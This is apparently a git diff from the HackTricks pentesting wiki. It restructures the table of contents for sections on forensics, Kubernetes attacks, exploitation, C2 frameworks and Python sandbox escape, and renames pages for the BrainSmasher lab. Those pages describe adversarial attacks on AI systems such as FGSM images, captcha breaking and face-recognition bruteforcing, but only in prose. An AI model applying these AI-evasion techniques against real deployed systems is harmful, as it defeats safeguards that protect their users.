diff --git a/README.md b/README.md
index 9cd4aaacc..92ec9ca7e 100644
--- a/README.md
+++ b/README.md
@@ -78,8 +78,8 @@ You can check their **blog** in [**https://blog.stmcyber.com**](https://blog.stm
You can find **my reviews of the certifications eMAPT and eWPTXv2** (and their **respective preparation courses**) in the following page:
-{% content-ref url="external-platforms-reviews-writeups/ine-courses-and-elearnsecurity-certifications-reviews.md" %}
-[ine-courses-and-elearnsecurity-certifications-reviews.md](external-platforms-reviews-writeups/ine-courses-and-elearnsecurity-certifications-reviews.md)
+{% content-ref url="courses-and-certifications-reviews/ine-courses-and-elearnsecurity-certifications-reviews.md" %}
+[ine-courses-and-elearnsecurity-certifications-reviews.md](courses-and-certifications-reviews/ine-courses-and-elearnsecurity-certifications-reviews.md)
{% endcontent-ref %}
## License
diff --git a/SUMMARY.md b/SUMMARY.md
index f35f20fc8..46906210b 100644
--- a/SUMMARY.md
+++ b/SUMMARY.md
@@ -25,38 +25,45 @@
* [Clone a Website](generic-methodologies-and-resources/phishing-methodology/clone-a-website.md)
* [Detecting Phising](generic-methodologies-and-resources/phishing-methodology/detecting-phising.md)
* [Phishing Documents](generic-methodologies-and-resources/phishing-methodology/phishing-documents.md)
-* [Basic Forensic Methodology](generic-methodologies-and-resources/basic-forensic-methodology/README.md)
- * [Baseline Monitoring](generic-methodologies-and-resources/basic-forensic-methodology/file-integrity-monitoring.md)
- * [Anti-Forensic Techniques](generic-methodologies-and-resources/basic-forensic-methodology/anti-forensic-techniques.md)
- * [Docker Forensics](generic-methodologies-and-resources/basic-forensic-methodology/docker-forensics.md)
- * [Image Adquisition & Mount](generic-methodologies-and-resources/basic-forensic-methodology/image-adquisition-and-mount.md)
- * [Linux Forensics](generic-methodologies-and-resources/basic-forensic-methodology/linux-forensics.md)
- * [Malware Analysis](generic-methodologies-and-resources/basic-forensic-methodology/malware-analysis.md)
- * [Memory dump analysis](generic-methodologies-and-resources/basic-forensic-methodology/memory-dump-analysis/README.md)
- * [Volatility - CheatSheet](generic-methodologies-and-resources/basic-forensic-methodology/memory-dump-analysis/volatility-examples.md)
- * [Partitions/File Systems/Carving](generic-methodologies-and-resources/basic-forensic-methodology/partitions-file-systems-carving/README.md)
- * [EXT](generic-methodologies-and-resources/basic-forensic-methodology/partitions-file-systems-carving/ext.md)
- * [File/Data Carving & Recovery Tools](generic-methodologies-and-resources/basic-forensic-methodology/partitions-file-systems-carving/file-data-carving-recovery-tools.md)
- * [NTFS](generic-methodologies-and-resources/basic-forensic-methodology/partitions-file-systems-carving/ntfs.md)
- * [Pcap Inspection](generic-methodologies-and-resources/basic-forensic-methodology/pcap-inspection/README.md)
- * [DNSCat pcap analysis](generic-methodologies-and-resources/basic-forensic-methodology/pcap-inspection/dnscat-exfiltration.md)
- * [USB Keystrokes](generic-methodologies-and-resources/basic-forensic-methodology/pcap-inspection/usb-keystrokes.md)
- * [Wifi Pcap Analysis](generic-methodologies-and-resources/basic-forensic-methodology/pcap-inspection/wifi-pcap-analysis.md)
- * [Wireshark tricks](generic-methodologies-and-resources/basic-forensic-methodology/pcap-inspection/wireshark-tricks.md)
- * [Specific Software/File-Type Tricks](generic-methodologies-and-resources/basic-forensic-methodology/specific-software-file-type-tricks/README.md)
- * [Decompile compiled python binaries (exe, elf) - Retreive from .pyc](generic-methodologies-and-resources/basic-forensic-methodology/specific-software-file-type-tricks/.pyc.md)
- * [Browser Artifacts](generic-methodologies-and-resources/basic-forensic-methodology/specific-software-file-type-tricks/browser-artifacts.md)
- * [Desofuscation vbs (cscript.exe)](generic-methodologies-and-resources/basic-forensic-methodology/specific-software-file-type-tricks/desofuscation-vbs-cscript.exe.md)
- * [Local Cloud Storage](generic-methodologies-and-resources/basic-forensic-methodology/specific-software-file-type-tricks/local-cloud-storage.md)
- * [Office file analysis](generic-methodologies-and-resources/basic-forensic-methodology/specific-software-file-type-tricks/office-file-analysis.md)
- * [PDF File analysis](generic-methodologies-and-resources/basic-forensic-methodology/specific-software-file-type-tricks/pdf-file-analysis.md)
- * [PNG tricks](generic-methodologies-and-resources/basic-forensic-methodology/specific-software-file-type-tricks/png-tricks.md)
- * [Video and Audio file analysis](generic-methodologies-and-resources/basic-forensic-methodology/specific-software-file-type-tricks/video-and-audio-file-analysis.md)
- * [ZIPs tricks](generic-methodologies-and-resources/basic-forensic-methodology/specific-software-file-type-tricks/zips-tricks.md)
- * [Windows Artifacts](generic-methodologies-and-resources/basic-forensic-methodology/windows-forensics/README.md)
- * [Windows Processes](generic-methodologies-and-resources/basic-forensic-methodology/windows-forensics/windows-processes.md)
- * [Interesting Windows Registry Keys](generic-methodologies-and-resources/basic-forensic-methodology/windows-forensics/interesting-windows-registry-keys.md)
+* [Basic Forensic Methodology](forensics/basic-forensic-methodology/README.md)
+ * [Baseline Monitoring](forensics/basic-forensic-methodology/file-integrity-monitoring.md)
+ * [Anti-Forensic Techniques](forensics/basic-forensic-methodology/anti-forensic-techniques.md)
+ * [Docker Forensics](forensics/basic-forensic-methodology/docker-forensics.md)
+ * [Image Adquisition & Mount](forensics/basic-forensic-methodology/image-adquisition-and-mount.md)
+ * [Linux Forensics](forensics/basic-forensic-methodology/linux-forensics.md)
+ * [Malware Analysis](forensics/basic-forensic-methodology/malware-analysis.md)
+ * [Memory dump analysis](forensics/basic-forensic-methodology/memory-dump-analysis/README.md)
+ * [Volatility - CheatSheet](forensics/basic-forensic-methodology/memory-dump-analysis/volatility-examples.md)
+ * [Partitions/File Systems/Carving](forensics/basic-forensic-methodology/partitions-file-systems-carving/README.md)
+ * [EXT](forensics/basic-forensic-methodology/partitions-file-systems-carving/ext.md)
+ * [File/Data Carving & Recovery Tools](forensics/basic-forensic-methodology/partitions-file-systems-carving/file-data-carving-recovery-tools.md)
+ * [NTFS](forensics/basic-forensic-methodology/partitions-file-systems-carving/ntfs.md)
+ * [Pcap Inspection](forensics/basic-forensic-methodology/pcap-inspection/README.md)
+ * [DNSCat pcap analysis](forensics/basic-forensic-methodology/pcap-inspection/dnscat-exfiltration.md)
+ * [USB Keystrokes](forensics/basic-forensic-methodology/pcap-inspection/usb-keystrokes.md)
+ * [Wifi Pcap Analysis](forensics/basic-forensic-methodology/pcap-inspection/wifi-pcap-analysis.md)
+ * [Wireshark tricks](forensics/basic-forensic-methodology/pcap-inspection/wireshark-tricks.md)
+ * [Specific Software/File-Type Tricks](forensics/basic-forensic-methodology/specific-software-file-type-tricks/README.md)
+ * [Decompile compiled python binaries (exe, elf) - Retreive from .pyc](forensics/basic-forensic-methodology/specific-software-file-type-tricks/.pyc.md)
+ * [Browser Artifacts](forensics/basic-forensic-methodology/specific-software-file-type-tricks/browser-artifacts.md)
+ * [Desofuscation vbs (cscript.exe)](forensics/basic-forensic-methodology/specific-software-file-type-tricks/desofuscation-vbs-cscript.exe.md)
+ * [Local Cloud Storage](forensics/basic-forensic-methodology/specific-software-file-type-tricks/local-cloud-storage.md)
+ * [Office file analysis](forensics/basic-forensic-methodology/specific-software-file-type-tricks/office-file-analysis.md)
+ * [PDF File analysis](forensics/basic-forensic-methodology/specific-software-file-type-tricks/pdf-file-analysis.md)
+ * [PNG tricks](forensics/basic-forensic-methodology/specific-software-file-type-tricks/png-tricks.md)
+ * [Video and Audio file analysis](forensics/basic-forensic-methodology/specific-software-file-type-tricks/video-and-audio-file-analysis.md)
+ * [ZIPs tricks](forensics/basic-forensic-methodology/specific-software-file-type-tricks/zips-tricks.md)
+ * [Windows Artifacts](forensics/basic-forensic-methodology/windows-forensics/README.md)
+ * [Windows Processes](forensics/basic-forensic-methodology/windows-forensics/windows-processes.md)
+ * [Interesting Windows Registry Keys](forensics/basic-forensic-methodology/windows-forensics/interesting-windows-registry-keys.md)
* [Brute Force - CheatSheet](generic-methodologies-and-resources/brute-force.md)
+* [Basic Python & Python Sandbox Escape](generic-methodologies-and-resources/basic-python/README.md)
+ * [venv](generic-methodologies-and-resources/basic-python/venv.md)
+ * [Bypass Python sandboxes](generic-methodologies-and-resources/basic-python/bypass-python-sandboxes/README.md)
+ * [Output Searching Python internals](generic-methodologies-and-resources/basic-python/bypass-python-sandboxes/output-searching-python-internals.md)
+ * [Magic Methods](generic-methodologies-and-resources/basic-python/magic-methods.md)
+ * [Web Requests](generic-methodologies-and-resources/basic-python/web-requests.md)
+ * [Bruteforce hash (few chars)](generic-methodologies-and-resources/basic-python/bruteforce-hash-few-chars.md)
* [Exfiltration](generic-methodologies-and-resources/exfiltration.md)
* [Tunneling and Port Forwarding](generic-methodologies-and-resources/tunneling-and-port-forwarding.md)
* [Search Exploits](generic-methodologies-and-resources/search-exploits.md)
@@ -420,7 +427,7 @@
* [CRLF (%0D%0A) Injection](pentesting-web/crlf-0d-0a.md)
* [Cross-site WebSocket hijacking (CSWSH)](pentesting-web/cross-site-websocket-hijacking-cswsh.md)
* [CSRF (Cross Site Request Forgery)](pentesting-web/csrf-cross-site-request-forgery.md)
-* [Dangling Markup - HTML scriptless injection](pentesting-web/dangling-markup-html-scriptless-injection/README.md)
+* [Dangling Markup - HTML scriptless injection](pentesting-web/dangling-markup-html-scriptless-injection.md)
* [HTML Injection / Char-by-char Exfiltration](pentesting-web/dangling-markup-html-scriptless-injection/html-injection-char-by-char-exfiltration/README.md)
* [CSS Injection Code](pentesting-web/dangling-markup-html-scriptless-injection/html-injection-char-by-char-exfiltration/css-injection-code.md)
* [Deserialization](pentesting-web/deserialization/README.md)
@@ -529,22 +536,22 @@
* [Basic Github Information](cloud-security/github-security/basic-github-information.md)
* [Gitea Security](cloud-security/gitea-security/README.md)
* [Basic Gitea Information](cloud-security/gitea-security/basic-gitea-information.md)
-* [Kubernetes Security](cloud-security/pentesting-kubernetes/README.md)
- * [Kubernetes Basics](cloud-security/pentesting-kubernetes/kubernetes-basics.md)
- * [Pentesting Kubernetes Services](cloud-security/pentesting-kubernetes/pentesting-kubernetes-from-the-outside.md)
- * [Exposing Services in Kubernetes](cloud-security/pentesting-kubernetes/exposing-services-in-kubernetes.md)
- * [Attacking Kubernetes from inside a Pod](cloud-security/pentesting-kubernetes/attacking-kubernetes-from-inside-a-pod.md)
+* [Kubernetes Security](pentesting/pentesting-kubernetes/README.md)
+ * [Kubernetes Basics](pentesting/pentesting-kubernetes/kubernetes-basics.md)
+ * [Pentesting Kubernetes Services](pentesting/pentesting-kubernetes/pentesting-kubernetes-from-the-outside.md)
+ * [Exposing Services in Kubernetes](pentesting/pentesting-kubernetes/exposing-services-in-kubernetes.md)
+ * [Attacking Kubernetes from inside a Pod](pentesting/pentesting-kubernetes/attacking-kubernetes-from-inside-a-pod.md)
* [Kubernetes Enumeration](cloud-security/pentesting-kubernetes/kubernetes-enumeration.md)
- * [Kubernetes Role-Based Access Control (RBAC)](cloud-security/pentesting-kubernetes/kubernetes-role-based-access-control-rbac.md)
+ * [Kubernetes Role-Based Access Control (RBAC)](pentesting/pentesting-kubernetes/kubernetes-role-based-access-control-rbac.md)
* [Abusing Roles/ClusterRoles in Kubernetes](cloud-security/pentesting-kubernetes/abusing-roles-clusterroles-in-kubernetes/README.md)
* [K8s Roles Abuse Lab](cloud-security/pentesting-kubernetes/abusing-roles-clusterroles-in-kubernetes/k8s-roles-abuse-lab.md)
* [Pod Escape Privileges](cloud-security/pentesting-kubernetes/abusing-roles-clusterroles-in-kubernetes/pod-escape-privileges.md)
* [Kubernetes Namespace Escalation](cloud-security/pentesting-kubernetes/namespace-escalation.md)
* [Kubernetes Access to other Clouds](cloud-security/pentesting-kubernetes/kubernetes-access-to-other-clouds.md)
- * [Kubernetes Hardening](cloud-security/pentesting-kubernetes/kubernetes-hardening/README.md)
- * [Monitoring with Falco](cloud-security/pentesting-kubernetes/kubernetes-hardening/monitoring-with-falco.md)
- * [Kubernetes SecurityContext(s)](cloud-security/pentesting-kubernetes/kubernetes-hardening/kubernetes-securitycontext-s.md)
- * [Kubernetes NetworkPolicies](cloud-security/pentesting-kubernetes/kubernetes-hardening/kubernetes-networkpolicies.md)
+ * [Kubernetes Hardening](pentesting/pentesting-kubernetes/kubernetes-hardening/README.md)
+ * [Monitoring with Falco](pentesting/pentesting-kubernetes/kubernetes-hardening/monitoring-with-falco.md)
+ * [Kubernetes SecurityContext(s)](pentesting/pentesting-kubernetes/kubernetes-hardening/kubernetes-securitycontext-s.md)
+ * [Kubernetes NetworkPolicies](pentesting/pentesting-kubernetes/kubernetes-hardening/kubernetes-networkpolicies.md)
* [Kubernetes Network Attacks](cloud-security/pentesting-kubernetes/kubernetes-network-attacks.md)
* [Concourse](cloud-security/concourse/README.md)
* [Concourse Architecture](cloud-security/concourse/concourse-architecture.md)
@@ -561,100 +568,97 @@
## š Hardware/Physical Access
-* [Physical Attacks](hardware-physical-access/physical-attacks.md)
-* [Escaping from KIOSKs](hardware-physical-access/escaping-from-gui-applications/README.md)
- * [Show file extensions](hardware-physical-access/escaping-from-gui-applications/show-file-extensions.md)
-* [Firmware Analysis](hardware-physical-access/firmware-analysis/README.md)
- * [Bootloader testing](hardware-physical-access/firmware-analysis/bootloader-testing.md)
- * [Firmware Integrity](hardware-physical-access/firmware-analysis/firmware-integrity.md)
+* [Physical Attacks](physical-attacks/physical-attacks.md)
+* [Escaping from KIOSKs](physical-attacks/escaping-from-gui-applications/README.md)
+ * [Show file extensions](physical-attacks/escaping-from-gui-applications/show-file-extensions.md)
+* [Firmware Analysis](physical-attacks/firmware-analysis/README.md)
+ * [Bootloader testing](physical-attacks/firmware-analysis/bootloader-testing.md)
+ * [Firmware Integrity](physical-attacks/firmware-analysis/firmware-integrity.md)
+
+## š¦
Reversing & Exploiting
+
+* [Reversing Tools & Basic Methods](reversing-and-exploiting/reversing-tools-basic-methods/README.md)
+ * [Angr](reversing-and-exploiting/reversing-tools-basic-methods/angr/README.md)
+ * [Angr - Examples](reversing-and-exploiting/reversing-tools-basic-methods/angr/angr-examples.md)
+ * [Z3 - Satisfiability Modulo Theories (SMT)](reversing-and-exploiting/reversing-tools-basic-methods/satisfiability-modulo-theories-smt-z3.md)
+ * [Cheat Engine](reversing-and-exploiting/reversing-tools-basic-methods/cheat-engine.md)
+ * [Blobrunner](reversing-and-exploiting/reversing-tools-basic-methods/blobrunner.md)
+* [Common API used in Malware](reversing-and-exploiting/common-api-used-in-malware.md)
+* [Word Macros](reversing-and-exploiting/word-macros.md)
+* [Linux Exploiting (Basic) (SPA)](reversing-and-exploiting/linux-exploiting-basic-esp/README.md)
+ * [Format Strings Template](reversing-and-exploiting/linux-exploiting-basic-esp/format-strings-template.md)
+ * [ROP - call sys\_execve](reversing-and-exploiting/linux-exploiting-basic-esp/rop-syscall-execv.md)
+ * [ROP - Leaking LIBC address](reversing-and-exploiting/linux-exploiting-basic-esp/rop-leaking-libc-address/README.md)
+ * [ROP - Leaking LIBC template](reversing-and-exploiting/linux-exploiting-basic-esp/rop-leaking-libc-address/rop-leaking-libc-template.md)
+ * [Bypassing Canary & PIE](reversing-and-exploiting/linux-exploiting-basic-esp/bypassing-canary-and-pie.md)
+ * [Ret2Lib](reversing-and-exploiting/linux-exploiting-basic-esp/ret2lib.md)
+ * [Fusion](reversing-and-exploiting/linux-exploiting-basic-esp/fusion.md)
+* [Exploiting Tools](reversing-and-exploiting/tools/README.md)
+ * [PwnTools](reversing-and-exploiting/tools/pwntools.md)
+* [Windows Exploiting (Basic Guide - OSCP lvl)](reversing-and-exploiting/windows-exploiting-basic-guide-oscp-lvl.md)
+
+## š® Crypto & Stego
+
+* [Cryptographic/Compression Algorithms](crypto-and-stego/cryptographic-algorithms/README.md)
+ * [Unpacking binaries](crypto-and-stego/cryptographic-algorithms/unpacking-binaries.md)
+* [Certificates](crypto-and-stego/certificates.md)
+* [Cipher Block Chaining CBC-MAC](crypto-and-stego/cipher-block-chaining-cbc-mac-priv.md)
+* [Crypto CTFs Tricks](crypto-and-stego/crypto-ctfs-tricks.md)
+* [Electronic Code Book (ECB)](crypto-and-stego/electronic-code-book-ecb.md)
+* [Hash Length Extension Attack](crypto-and-stego/hash-length-extension-attack.md)
+* [Padding Oracle](crypto-and-stego/padding-oracle-priv.md)
+* [RC4 - Encrypt\&Decrypt](crypto-and-stego/rc4-encrypt-and-decrypt.md)
+* [Stego Tricks](crypto-and-stego/stego-tricks.md)
+* [Esoteric languages](crypto-and-stego/esoteric-languages.md)
+* [Blockchain & Crypto Currencies](crypto-and-stego/blockchain-and-crypto-currencies.md)
## š§ External Platforms Reviews/Writeups
-* [BRA.I.NSMASHER Presentation](external-platforms-reviews-writeups/bra.i.nsmasher-presentation/README.md)
- * [Basic Bruteforcer](external-platforms-reviews-writeups/bra.i.nsmasher-presentation/basic-bruteforcer.md)
- * [Basic Captcha Breaker](external-platforms-reviews-writeups/bra.i.nsmasher-presentation/basic-captcha-breaker.md)
- * [BIM Bruteforcer](external-platforms-reviews-writeups/bra.i.nsmasher-presentation/bim-bruteforcer.md)
- * [Hybrid Malware Classifier Part 1](external-platforms-reviews-writeups/bra.i.nsmasher-presentation/hybrid-malware-classifier-part-1.md)
- * [ML Basics](external-platforms-reviews-writeups/bra.i.nsmasher-presentation/ml-basics/README.md)
- * [Feature Engineering](external-platforms-reviews-writeups/bra.i.nsmasher-presentation/ml-basics/feature-engineering.md)
-* [INE Courses and eLearnSecurity Certifications Reviews](external-platforms-reviews-writeups/ine-courses-and-elearnsecurity-certifications-reviews.md)
+* [BRA.I.NSMASHER Presentation](a.i.-exploiting/bra.i.nsmasher-presentation/README.md)
+ * [Basic Bruteforcer](a.i.-exploiting/bra.i.nsmasher-presentation/basic-bruteforcer.md)
+ * [Basic Captcha Breaker](a.i.-exploiting/bra.i.nsmasher-presentation/basic-captcha-breaker.md)
+ * [BIM Bruteforcer](a.i.-exploiting/bra.i.nsmasher-presentation/bim-bruteforcer.md)
+ * [Hybrid Malware Classifier Part 1](a.i.-exploiting/bra.i.nsmasher-presentation/hybrid-malware-classifier-part-1.md)
+ * [ML Basics](a.i.-exploiting/bra.i.nsmasher-presentation/ml-basics/README.md)
+ * [Feature Engineering](a.i.-exploiting/bra.i.nsmasher-presentation/ml-basics/feature-engineering.md)
+* [INE Courses and eLearnSecurity Certifications Reviews](courses-and-certifications-reviews/ine-courses-and-elearnsecurity-certifications-reviews.md)
-## Group 1
+## š¦ C2
-* [Reversing & Exploiting](group-1/reversing-and-exploiting.md)
-* [Reversing Tools & Basic Methods](group-1/reversing-tools-basic-methods/README.md)
- * [Angr](group-1/reversing-tools-basic-methods/angr/README.md)
- * [Angr - Examples](group-1/reversing-tools-basic-methods/angr/angr-examples.md)
- * [Z3 - Satisfiability Modulo Theories (SMT)](group-1/reversing-tools-basic-methods/satisfiability-modulo-theories-smt-z3.md)
- * [Cheat Engine](group-1/reversing-tools-basic-methods/cheat-engine.md)
- * [Blobrunner](group-1/reversing-tools-basic-methods/blobrunner.md)
-* [Common API used in Malware](group-1/common-api-used-in-malware.md)
-* [Linux Exploiting (Basic) (SPA)](group-1/linux-exploiting-basic-esp/README.md)
- * [Format Strings Template](group-1/linux-exploiting-basic-esp/format-strings-template.md)
- * [ROP - call sys\_execve](group-1/linux-exploiting-basic-esp/rop-syscall-execv.md)
- * [ROP - Leaking LIBC address](group-1/linux-exploiting-basic-esp/rop-leaking-libc-address/README.md)
- * [ROP - Leaking LIBC template](group-1/linux-exploiting-basic-esp/rop-leaking-libc-address/rop-leaking-libc-template.md)
- * [Bypassing Canary & PIE](group-1/linux-exploiting-basic-esp/bypassing-canary-and-pie.md)
- * [Ret2Lib](group-1/linux-exploiting-basic-esp/ret2lib.md)
- * [Fusion](group-1/linux-exploiting-basic-esp/fusion.md)
-* [Exploiting Tools](group-1/tools/README.md)
- * [PwnTools](group-1/tools/pwntools.md)
-* [Windows Exploiting (Basic Guide - OSCP lvl)](group-1/windows-exploiting-basic-guide-oscp-lvl.md)
+* [Merlin](c2/merlin.md)
+* [Empire](c2/empire.md)
+* [Salseo](c2/salseo.md)
+* [ICMPsh](c2/icmpsh.md)
-***
+## ā TODO
-* [Blockchain & Crypto Currencies](blockchain/blockchain-and-crypto-currencies/README.md)
- * [Page 1](blockchain/blockchain-and-crypto-currencies/page-1.md)
-* [Cryptographic/Compression Algorithms](reversing/cryptographic-algorithms/README.md)
- * [Unpacking binaries](reversing/cryptographic-algorithms/unpacking-binaries.md)
-* [Word Macros](reversing/word-macros.md)
-* [Certificates](cryptography/certificates.md)
-* [Cipher Block Chaining CBC-MAC](cryptography/cipher-block-chaining-cbc-mac-priv.md)
-* [Crypto CTFs Tricks](cryptography/crypto-ctfs-tricks.md)
-* [Electronic Code Book (ECB)](cryptography/electronic-code-book-ecb.md)
-* [Hash Length Extension Attack](cryptography/hash-length-extension-attack.md)
-* [Padding Oracle](cryptography/padding-oracle-priv.md)
-* [RC4 - Encrypt\&Decrypt](cryptography/rc4-encrypt-and-decrypt.md)
-* [Merlin](backdoors/merlin.md)
-* [Empire](backdoors/empire.md)
-* [Salseo](backdoors/salseo.md)
-* [ICMPsh](backdoors/icmpsh.md)
-* [Stego Tricks](stego/stego-tricks.md)
-* [Esoteric languages](stego/esoteric-languages.md)
-* [Basic Python](misc/basic-python/README.md)
- * [venv](misc/basic-python/venv.md)
- * [Bypass Python sandboxes](misc/basic-python/bypass-python-sandboxes/README.md)
- * [Output Searching Python internals](misc/basic-python/bypass-python-sandboxes/output-searching-python-internals.md)
- * [Magic Methods](misc/basic-python/magic-methods.md)
- * [Web Requests](misc/basic-python/web-requests.md)
- * [Bruteforce hash (few chars)](misc/basic-python/bruteforce-hash-few-chars.md)
-* [Other Big References](misc/references.md)
+* [Other Big References](todo/references.md)
* [More Tools](todo/more-tools.md)
* [MISC](todo/misc.md)
-* [Pentesting DNS](pentesting-dns.md)
+* [Pentesting DNS](todo/pentesting-dns.md)
* [Hardware Hacking](todo/hardware-hacking/README.md)
* [I2C](todo/hardware-hacking/i2c.md)
* [UART](todo/hardware-hacking/uart.md)
* [Radio](todo/hardware-hacking/radio.md)
* [JTAG](todo/hardware-hacking/jtag.md)
* [SPI](todo/hardware-hacking/spi.md)
-* [Radio Hacking](radio-hacking/README.md)
- * [Pentesting RFID](radio-hacking/pentesting-rfid.md)
- * [Low-Power Wide Area Network](radio-hacking/low-power-wide-area-network.md)
- * [Pentesting BLE - Bluetooth Low Energy](radio-hacking/pentesting-ble-bluetooth-low-energy.md)
-* [Burp Suite](burp-suite.md)
-* [Other Web Tricks](other-web-tricks.md)
-* [Interesting HTTP](interesting-http.md)
-* [Emails Vulnerabilities](emails-vulns.md)
-* [Android Forensics](android-forensics.md)
-* [TR-069](tr-069.md)
-* [6881/udp - Pentesting BitTorrent](6881-udp-pentesting-bittorrent.md)
-* [CTF Write-ups](ctf-write-ups/README.md)
- * [challenge-0521.intigriti.io](ctf-write-ups/challenge-0521.intigriti.io.md)
- * [Try Hack Me](ctf-write-ups/try-hack-me/README.md)
- * [hc0n Christmas CTF - 2019](ctf-write-ups/try-hack-me/hc0n-christmas-ctf-2019.md)
- * [Pickle Rick](ctf-write-ups/try-hack-me/pickle-rick.md)
-* [1911 - Pentesting fox](1911-pentesting-fox.md)
-* [Online Platforms with API](online-platforms-with-api.md)
-* [Stealing Sensitive Information Disclosure from a Web](stealing-sensitive-information-disclosure-from-a-web.md)
-* [Post Exploitation](post-exploitation.md)
+* [Radio Hacking](todo/radio-hacking/README.md)
+ * [Pentesting RFID](todo/radio-hacking/pentesting-rfid.md)
+ * [Low-Power Wide Area Network](todo/radio-hacking/low-power-wide-area-network.md)
+ * [Pentesting BLE - Bluetooth Low Energy](todo/radio-hacking/pentesting-ble-bluetooth-low-energy.md)
+* [Burp Suite](todo/burp-suite.md)
+* [Other Web Tricks](todo/other-web-tricks.md)
+* [Interesting HTTP](todo/interesting-http.md)
+* [Emails Vulnerabilities](todo/emails-vulns.md)
+* [Android Forensics](todo/android-forensics.md)
+* [TR-069](todo/tr-069.md)
+* [6881/udp - Pentesting BitTorrent](todo/6881-udp-pentesting-bittorrent.md)
+* [CTF Write-ups](todo/ctf-write-ups/README.md)
+ * [challenge-0521.intigriti.io](todo/ctf-write-ups/challenge-0521.intigriti.io.md)
+ * [Try Hack Me](todo/ctf-write-ups/try-hack-me/README.md)
+ * [hc0n Christmas CTF - 2019](todo/ctf-write-ups/try-hack-me/hc0n-christmas-ctf-2019.md)
+ * [Pickle Rick](todo/ctf-write-ups/try-hack-me/pickle-rick.md)
+* [1911 - Pentesting fox](todo/1911-pentesting-fox.md)
+* [Online Platforms with API](todo/online-platforms-with-api.md)
+* [Stealing Sensitive Information Disclosure from a Web](todo/stealing-sensitive-information-disclosure-from-a-web.md)
+* [Post Exploitation](todo/post-exploitation.md)
diff --git a/external-platforms-reviews-writeups/bra.i.nsmasher-presentation/README.md b/a.i.-exploiting/bra.i.nsmasher-presentation/README.md
similarity index 98%
rename from external-platforms-reviews-writeups/bra.i.nsmasher-presentation/README.md
rename to a.i.-exploiting/bra.i.nsmasher-presentation/README.md
index c7e64340e..d7aa01308 100644
--- a/external-platforms-reviews-writeups/bra.i.nsmasher-presentation/README.md
+++ b/a.i.-exploiting/bra.i.nsmasher-presentation/README.md
@@ -1,4 +1,4 @@
-
+# BRA.I.NSMASHER Presentation
@@ -16,8 +16,7 @@ Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
-
-# Presentation
+## Presentation
**BrainSmasher** is a platform made with the purpose of aiding **pentesters, researcher, students, A.I. Cybersecurity engineers** to practice and learn all the techniques for **exploiting commercial A.I.** applications, by working on specifically crafted labs that reproduce several systems, like face recognition, speech recognition, ensemble image classification, autonomous drive, malware evasion, chatbot, data poisoning etc...
@@ -37,7 +36,7 @@ _A big thanks to Hacktricks and Carlos Polop for giving us this opportunity_
> _Walter Miele from BrA.I.nsmasher_
-# Registry Challenge
+## Registry Challenge
In order to register in [**BrA.I.Smasher** ](https://beta.brainsmasher.eu)you need to solve an easy challenge ([**here**](https://beta.brainsmasher.eu/registrationChallenge)).\
Just think how you can confuse a neuronal network while not confusing the other one knowing that one detects better the panda while the other one is worse...
@@ -48,13 +47,12 @@ However, if at some point you **don't know how to solve** the challenge, or **ev
I have to tell you that there are **easier ways** to pass the challenge, but this **solution** is **awesome** as you will learn how to pass the challenge performing an **Adversarial Image performing a Fast Gradient Signed Method (FGSM) attack for images.**
-# More Tutorials
+## More Tutorials
{% content-ref url="basic-captcha-breaker.md" %}
[basic-captcha-breaker.md](basic-captcha-breaker.md)
{% endcontent-ref %}
-
Support HackTricks and get benefits!
@@ -70,5 +68,3 @@ Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
**Share your hacking tricks submitting PRs to the** [**hacktricks github repo**](https://github.com/carlospolop/hacktricks)**.**
-
-
diff --git a/external-platforms-reviews-writeups/bra.i.nsmasher-presentation/basic-bruteforcer.md b/a.i.-exploiting/bra.i.nsmasher-presentation/basic-bruteforcer.md
similarity index 98%
rename from external-platforms-reviews-writeups/bra.i.nsmasher-presentation/basic-bruteforcer.md
rename to a.i.-exploiting/bra.i.nsmasher-presentation/basic-bruteforcer.md
index 8afa804bc..552a579a2 100644
--- a/external-platforms-reviews-writeups/bra.i.nsmasher-presentation/basic-bruteforcer.md
+++ b/a.i.-exploiting/bra.i.nsmasher-presentation/basic-bruteforcer.md
@@ -1,4 +1,4 @@
-
+# Basic Bruteforcer
@@ -16,8 +16,7 @@ Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
-
-# BRUTEFORCER IMAGE CORRUPTION SCRIPT
+## BRUTEFORCER IMAGE CORRUPTION SCRIPT
The purpose here is to introduce the user to some basic concepts about **A.I. apps exploiting**, via some easy to follow scripts, which represents the core for writing useful tools.\
\
In this example (which can be used to solve the easy labs of BrainSmasher) by recalling also what is written in the solution for the introduction challenge, we will provide a simple yet useful way, in order to iteratively produce some corrupted images, to bruteforce the face recon easy labs (and thus also real applications that relies on the same principles)
@@ -30,7 +29,6 @@ Try it on our labs [**BrA.I.Smasher Website**](https://beta.brainsmasher.eu)
Enjoy and stay safe!
-
Support HackTricks and get benefits!
@@ -46,5 +44,3 @@ Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
**Share your hacking tricks submitting PRs to the** [**hacktricks github repo**](https://github.com/carlospolop/hacktricks)**.**
-
-
diff --git a/external-platforms-reviews-writeups/bra.i.nsmasher-presentation/basic-captcha-breaker.md b/a.i.-exploiting/bra.i.nsmasher-presentation/basic-captcha-breaker.md
similarity index 92%
rename from external-platforms-reviews-writeups/bra.i.nsmasher-presentation/basic-captcha-breaker.md
rename to a.i.-exploiting/bra.i.nsmasher-presentation/basic-captcha-breaker.md
index 741962e0b..1bcb91e05 100644
--- a/external-platforms-reviews-writeups/bra.i.nsmasher-presentation/basic-captcha-breaker.md
+++ b/a.i.-exploiting/bra.i.nsmasher-presentation/basic-captcha-breaker.md
@@ -1,4 +1,4 @@
-
+# Basic Captcha Breaker
@@ -16,13 +16,10 @@ Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
-
-In this tutorial **a basic captcha is going to be broken**.
+In this tutorial **a basic captcha is going to be broken**.\
A **NN is going to be trained** using several **images** that represents **letters** and then this NN is going to be used to **automatically identify the letters inside a captcha image**.
-Check the awesome guided tutorial provided by [**BrA.In Smasher**](https://beta.brainsmasher.eu/) in this [**google collab page**](https://colab.research.google.com/drive/1uiQJpqEj5V2_ijoumSd2noaDJuniTlKq?usp=sharing).
-
-
+Check the awesome guided tutorial provided by [**BrA.In Smasher**](https://beta.brainsmasher.eu) in this [**google collab page**](https://colab.research.google.com/drive/1uiQJpqEj5V2\_ijoumSd2noaDJuniTlKq?usp=sharing).
@@ -39,5 +36,3 @@ Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
